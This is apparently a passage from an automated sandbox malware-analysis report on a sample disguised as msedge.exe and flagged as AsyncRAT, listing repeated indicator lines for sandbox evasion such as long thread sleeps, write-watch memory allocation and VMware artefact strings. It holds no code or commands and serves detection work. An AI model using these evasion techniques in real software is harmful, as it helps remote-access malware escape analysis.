Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: 1A9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1B200000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 3102			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 6725			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598713s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598482s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596283s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596163s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595909s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595612s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 1700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
